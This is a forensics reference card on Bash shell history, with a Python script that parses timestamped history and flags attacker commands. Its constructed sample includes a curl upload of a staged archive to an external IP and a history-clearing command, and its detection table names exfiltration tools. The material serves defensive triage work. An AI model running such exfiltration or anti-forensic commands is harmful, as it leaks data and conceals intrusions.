.bash_history (Shell History)
Linux | Execution Evidence | Disk Image
Location
/home/<username>/.bash_history and /root/.bash_history
Description
Per-user command history file recording shell commands entered in interactive Bash sessions. May also include .zsh_history, .ash_history, or .python_history depending on the shell and tools used.
Forensic Value
Shell history provides a direct record of attacker commands including reconnaissance (whoami, id, uname -a), lateral movement (ssh, scp), data staging (tar, zip), and exfiltration (curl, wget, scp to external IPs). Sophisticated attackers may clear history (unset HISTFILE, history -c), but partially written history files and timestamps (if HISTTIMEFORMAT was set) often survive. Always check all user accounts including service accounts.
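The triage described above, as an added example that is not part of the original page: a small parser for a Bash history file that honours the `#<epoch>` stamp lines Bash writes when HISTTIMEFORMAT was set, and flags commands in the categories listed (reconnaissance, lateral movement, staging, exfiltration, history clearing). The sample history, the category table and the `203.0.113.10` address are constructed for the example; the category keywords are exactly the ones named in the artifact description, so extend the table for your own casework.

```python
"""Parse a .bash_history file and flag commands of forensic interest.

Added example for the artifact card above; the sample history below is
constructed, not recovered from any real system.
"""
import re
from datetime import datetime, timezone

# Constructed sample. When HISTTIMEFORMAT was set, Bash stores a "#<epoch>"
# line immediately before each command; commands entered in sessions without
# it (here: "ls -la") carry no stamp and inherit nothing.
SAMPLE_HISTORY = """#1700000000
whoami
#1700000005
uname -a
#1700000060
tar czf /tmp/.cache.tgz /var/www/html
#1700000120
curl -T /tmp/.cache.tgz http://203.0.113.10/upload
ls -la
#1700000300
history -c
"""

# Program names from the artifact description, keyed by category (constructed
# table; scp legitimately appears under both lateral movement and exfiltration).
CATEGORIES = {
    "reconnaissance": {"whoami", "id", "uname"},
    "lateral_movement": {"ssh", "scp"},
    "data_staging": {"tar", "zip"},
    "exfiltration": {"curl", "wget", "scp"},
}
# History-clearing idioms named on the page, matched on the whole segment.
ANTI_FORENSICS_RE = re.compile(r"^(unset\s+HISTFILE|history\s+-c)\b")
TIMESTAMP_RE = re.compile(r"^#(\d{9,10})$")


def parse_history(text):
    """Return a list of {'ts': datetime|None, 'cmd': str} in file order.

    A '#<epoch>' line is attached to the command that follows it; a command
    with no preceding stamp gets ts=None rather than a guessed value.
    """
    entries, pending_ts = [], None
    for line in text.splitlines():
        m = TIMESTAMP_RE.match(line)
        if m:
            pending_ts = datetime.fromtimestamp(int(m.group(1)), tz=timezone.utc)
            continue
        if not line.strip():
            continue
        entries.append({"ts": pending_ts, "cmd": line})
        pending_ts = None
    return entries


def classify(cmd):
    """Return the set of category names triggered by a command line.

    Each pipeline/sequence segment is inspected separately, a leading 'sudo'
    is skipped, and a path prefix (/usr/bin/curl) is stripped so the program
    name is compared against the table.
    """
    cats = set()
    for segment in re.split(r"[|;&]+", cmd):
        segment = segment.strip()
        if not segment:
            continue
        if ANTI_FORENSICS_RE.match(segment):
            cats.add("anti_forensics")
        tokens = segment.split()
        if tokens[0] == "sudo" and len(tokens) > 1:
            tokens = tokens[1:]
        prog = tokens[0].rsplit("/", 1)[-1]
        for name, progs in CATEGORIES.items():
            if prog in progs:
                cats.add(name)
    return cats


def triage(text):
    """Parse history and keep only flagged entries as (iso_ts|None, cmd, [cats])."""
    out = []
    for e in parse_history(text):
        cats = classify(e["cmd"])
        if cats:
            ts = e["ts"].isoformat() if e["ts"] else None
            out.append((ts, e["cmd"], sorted(cats)))
    return out


if __name__ == "__main__":
    for ts, cmd, cats in triage(SAMPLE_HISTORY):
        print(f"{ts or 'no-timestamp':<25} {','.join(cats):<30} {cmd}")
```

Run it against each recovered history file (`python3 triage.py < /mnt/image/home/alice/.bash_history` once `SAMPLE_HISTORY` is replaced by `sys.stdin.read()`), and compare the last stamped entry with the file's mtime: Bash normally flushes history at shell exit, so a history ending in `history -c` with a much later mtime is itself worth recording as an indicator.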
Tools Required
cat, grep, find, strings